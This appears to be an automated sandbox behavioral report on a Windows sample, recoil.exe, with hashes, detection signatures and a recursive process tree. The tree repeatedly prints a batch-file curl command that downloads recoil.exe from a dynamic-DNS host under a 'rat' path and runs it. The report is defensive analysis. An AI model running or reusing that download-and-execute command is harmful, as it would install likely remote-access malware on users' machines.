Analysis
-
max time kernel
39s -
max time network
44s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
28/05/2024, 12:00
Behavioral task
behavioral1
Sample
recoil.exe
Resource
win11-20240426-en
8 signatures
150 seconds
General
-
Target
recoil.exe
-
Size
22KB
-
MD5
f96468ce1fbd664a13a9f4ddd982c495
-
SHA1
33881c4a4f1e35b091e9c2b4c2407fced0a73d9d
-
SHA256
874523d3c2f55b54754cd4d02433670aa1f310826377a63e14335cb514a91f6b
-
SHA512
ca2bd716b89d159f53de8079bbd5784cccf0c8e5cd732f321f8601907def97bb03facdd50299186c4dade6c0bfd62a773b1c16cb4c6c736e391bc8ab8cc1ff66
-
SSDEEP
384:FbCEXMMADQIrUeNFwx9E5xtT6fkCMst8AdxIiv4dK8y8KG8szTO4Am7UnwtzwG3U:11NAUsbxtT6sFst/3IrdlLUwzxnbcuy2
Score
8/10
Malware Config
Signatures
-
Downloads MZ/PE file
-
resource yara_rule behavioral1/memory/1324-0-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/1324-5-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/3396-10-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/848-14-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/1868-19-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/3540-23-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/2664-28-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/788-33-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/4864-37-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/1908-42-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/2796-46-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/5020-51-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/4312-56-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/4800-61-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/3844-66-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/1524-71-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/4588-76-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/4836-81-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/3408-86-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/4928-91-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/3684-96-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/2444-100-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/1812-104-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/1560-109-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/1244-114-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/440-119-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/5012-124-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/1376-129-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/4568-134-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/4924-139-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/4048-143-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/236-147-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/1948-152-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/2868-157-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/2708-162-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/4268-167-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/868-172-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/3140-176-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/1992-181-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/4976-186-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/3144-191-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/1996-196-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/4608-201-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/2284-205-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/2284-206-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/1940-211-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/5076-215-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/2736-220-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/2660-225-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/2636-230-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/248-235-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/844-239-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/4932-244-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/4576-249-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/3252-254-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/1956-259-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/4164-264-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/3344-269-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/1588-273-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/1848-278-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/4912-283-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/4748-288-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/424-292-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/3228-296-0x0000000000400000-0x0000000000410000-memory.dmp upx -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1188 msedge.exe 1188 msedge.exe 568 msedge.exe 568 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe 568 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1324 wrote to memory of 3860 1324 recoil.exe 78 PID 1324 wrote to memory of 3860 1324 recoil.exe 78 PID 1324 wrote to memory of 3860 1324 recoil.exe 78 PID 3860 wrote to memory of 3388 3860 cmd.exe 79 PID 3860 wrote to memory of 3388 3860 cmd.exe 79 PID 3860 wrote to memory of 3388 3860 cmd.exe 79 PID 3860 wrote to memory of 3396 3860 cmd.exe 80 PID 3860 wrote to memory of 3396 3860 cmd.exe 80 PID 3860 wrote to memory of 3396 3860 cmd.exe 80 PID 3396 wrote to memory of 1920 3396 recoil.exe 82 PID 3396 wrote to memory of 1920 3396 recoil.exe 82 PID 3396 wrote to memory of 1920 3396 recoil.exe 82 PID 1920 wrote to memory of 4144 1920 cmd.exe 83 PID 1920 wrote to memory of 4144 1920 cmd.exe 83 PID 1920 wrote to memory of 4144 1920 cmd.exe 83 PID 1920 wrote to memory of 848 1920 cmd.exe 84 PID 1920 wrote to memory of 848 1920 cmd.exe 84 PID 1920 wrote to memory of 848 1920 cmd.exe 84 PID 848 wrote to memory of 2244 848 recoil.exe 86 PID 848 wrote to memory of 2244 848 recoil.exe 86 PID 848 wrote to memory of 2244 848 recoil.exe 86 PID 2244 wrote to memory of 2008 2244 cmd.exe 87 PID 2244 wrote to memory of 2008 2244 cmd.exe 87 PID 2244 wrote to memory of 2008 2244 cmd.exe 87 PID 2244 wrote to memory of 1868 2244 cmd.exe 88 PID 2244 wrote to memory of 1868 2244 cmd.exe 88 PID 2244 wrote to memory of 1868 2244 cmd.exe 88 PID 1868 wrote to memory of 1952 1868 recoil.exe 90 PID 1868 wrote to memory of 1952 1868 recoil.exe 90 PID 1868 wrote to memory of 1952 1868 recoil.exe 90 PID 1952 wrote to memory of 4032 1952 cmd.exe 91 PID 1952 wrote to memory of 4032 1952 cmd.exe 91 PID 1952 wrote to memory of 4032 1952 cmd.exe 91 PID 1952 wrote to memory of 3540 1952 cmd.exe 92 PID 1952 wrote to memory of 3540 1952 cmd.exe 92 PID 1952 wrote to memory of 3540 1952 cmd.exe 92 PID 3540 wrote to memory of 1692 3540 recoil.exe 94 PID 3540 wrote to memory of 1692 3540 recoil.exe 94 PID 3540 wrote to memory of 1692 3540 recoil.exe 94 PID 1692 wrote to memory of 3064 1692 cmd.exe 95 PID 1692 wrote to memory of 3064 1692 cmd.exe 95 PID 1692 wrote to memory of 3064 1692 cmd.exe 95 PID 1692 wrote to memory of 2664 1692 cmd.exe 96 PID 1692 wrote to memory of 2664 1692 cmd.exe 96 PID 1692 wrote to memory of 2664 1692 cmd.exe 96 PID 2664 wrote to memory of 644 2664 recoil.exe 98 PID 2664 wrote to memory of 644 2664 recoil.exe 98 PID 2664 wrote to memory of 644 2664 recoil.exe 98 PID 644 wrote to memory of 2976 644 cmd.exe 99 PID 644 wrote to memory of 2976 644 cmd.exe 99 PID 644 wrote to memory of 2976 644 cmd.exe 99 PID 644 wrote to memory of 788 644 cmd.exe 100 PID 644 wrote to memory of 788 644 cmd.exe 100 PID 644 wrote to memory of 788 644 cmd.exe 100 PID 788 wrote to memory of 4580 788 recoil.exe 102 PID 788 wrote to memory of 4580 788 recoil.exe 102 PID 788 wrote to memory of 4580 788 recoil.exe 102 PID 4580 wrote to memory of 1244 4580 cmd.exe 103 PID 4580 wrote to memory of 1244 4580 cmd.exe 103 PID 4580 wrote to memory of 1244 4580 cmd.exe 103 PID 4580 wrote to memory of 4864 4580 cmd.exe 104 PID 4580 wrote to memory of 4864 4580 cmd.exe 104 PID 4580 wrote to memory of 4864 4580 cmd.exe 104 PID 4864 wrote to memory of 2152 4864 recoil.exe 106
Processes
-
C:\Users\Admin\AppData\Local\Temp\recoil.exe"C:\Users\Admin\AppData\Local\Temp\recoil.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4E8D.tmp\test.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:3860 -
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe3⤵PID:3388
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3396 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\53DD.tmp\test.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe5⤵PID:4144
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe5⤵
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\59A9.tmp\test.bat""6⤵
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe7⤵PID:2008
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe7⤵
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5B5E.tmp\test.bat""8⤵
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe9⤵PID:4032
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe9⤵
- Suspicious use of WriteProcessMemory
PID:3540 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5D24.tmp\test.bat""10⤵
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe11⤵PID:3064
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe11⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5EE9.tmp\test.bat""12⤵
- Suspicious use of WriteProcessMemory
PID:644 -
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe13⤵PID:2976
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe13⤵
- Suspicious use of WriteProcessMemory
PID:788 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\607F.tmp\test.bat""14⤵
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe15⤵PID:1244
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe15⤵
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6244.tmp\test.bat""16⤵PID:2152
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe17⤵PID:4672
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe17⤵PID:1908
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\63EA.tmp\test.bat""18⤵PID:1460
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe19⤵PID:1032
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe19⤵PID:2796
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6590.tmp\test.bat""20⤵PID:2088
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe21⤵PID:1616
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe21⤵PID:5020
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6726.tmp\test.bat""22⤵PID:1600
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe23⤵PID:2552
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe23⤵PID:4312
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\68DC.tmp\test.bat""24⤵PID:4792
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe25⤵PID:4924
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe25⤵PID:4800
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6A91.tmp\test.bat""26⤵PID:1300
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe27⤵PID:420
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe27⤵PID:3844
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6C37.tmp\test.bat""28⤵PID:1564
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe29⤵PID:392
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe29⤵PID:1524
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6E89.tmp\test.bat""30⤵PID:2672
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe31⤵PID:3048
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe31⤵PID:4588
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\701F.tmp\test.bat""32⤵PID:2840
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe33⤵PID:4168
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe33⤵PID:4836
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\71D4.tmp\test.bat""34⤵PID:4956
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe35⤵PID:1372
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe35⤵PID:3408
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73A9.tmp\test.bat""36⤵PID:4004
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe37⤵PID:1860
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe37⤵PID:4928
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\757E.tmp\test.bat""38⤵PID:4324
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe39⤵PID:1596
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe39⤵PID:3684
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7733.tmp\test.bat""40⤵PID:3676
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe41⤵PID:1828
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe41⤵PID:2444
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\78E9.tmp\test.bat""42⤵PID:1156
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe43⤵PID:4868
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe43⤵PID:1812
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7A9E.tmp\test.bat""44⤵PID:2160
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe45⤵PID:1312
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe45⤵PID:1560
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7C44.tmp\test.bat""46⤵PID:4760
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe47⤵PID:4364
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe47⤵PID:1244
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7E09.tmp\test.bat""48⤵PID:912
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe49⤵PID:4140
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe49⤵PID:440
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7FFD.tmp\test.bat""50⤵PID:2484
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe51⤵PID:1460
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe51⤵PID:5012
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\81A3.tmp\test.bat""52⤵PID:1704
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe53⤵PID:3824
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe53⤵PID:1376
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8359.tmp\test.bat""54⤵PID:1392
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe55⤵PID:4912
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe55⤵PID:4568
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\850E.tmp\test.bat""56⤵PID:768
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe57⤵PID:4284
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe57⤵PID:4924
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\86D3.tmp\test.bat""58⤵PID:1356
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe59⤵PID:4352
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe59⤵PID:4048
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8899.tmp\test.bat""60⤵PID:1236
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe61⤵PID:2096
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe61⤵PID:236
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8A4E.tmp\test.bat""62⤵PID:4224
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe63⤵PID:3268
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe63⤵PID:1948
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8BF4.tmp\test.bat""64⤵PID:4692
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe65⤵PID:4104
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe65⤵PID:2868
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8DB9.tmp\test.bat""66⤵PID:3388
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe67⤵PID:2768
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe67⤵PID:2708
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8F7E.tmp\test.bat""68⤵PID:2296
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe69⤵PID:872
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe69⤵PID:4268
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9134.tmp\test.bat""70⤵PID:2980
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe71⤵PID:3744
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe71⤵PID:868
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\92F9.tmp\test.bat""72⤵PID:3340
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe73⤵PID:2276
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe73⤵PID:3140
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\94AE.tmp\test.bat""74⤵PID:1532
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe75⤵PID:1156
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe75⤵PID:1992
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9683.tmp\test.bat""76⤵PID:2572
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe77⤵PID:2856
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe77⤵PID:4976
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9839.tmp\test.bat""78⤵PID:1856
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe79⤵PID:3460
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe79⤵PID:3144
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\99DE.tmp\test.bat""80⤵PID:748
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe81⤵PID:540
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe81⤵PID:1996
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9BB3.tmp\test.bat""82⤵PID:1460
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe83⤵PID:2292
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe83⤵PID:4608
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9D88.tmp\test.bat""84⤵PID:3824
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe85⤵PID:496
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe85⤵PID:2284
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A076.tmp\test.bat""86⤵PID:2156
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe87⤵PID:3052
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe87⤵PID:1940
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A22B.tmp\test.bat""88⤵PID:4460
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe89⤵PID:5108
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe89⤵PID:5076
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A3D1.tmp\test.bat""90⤵PID:2724
-
C:\Windows\SysWOW64\curl.execurl https://beecz.ddns.net:8082/rat/recoil.exe --output recoil.exe91⤵PID:424
-
-
C:\Users\Admin\AppData\Local\Temp\recoil.exerecoil.exe91⤵PID:2736
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A587.tmp\test.bat""92⤵PID:3484
-
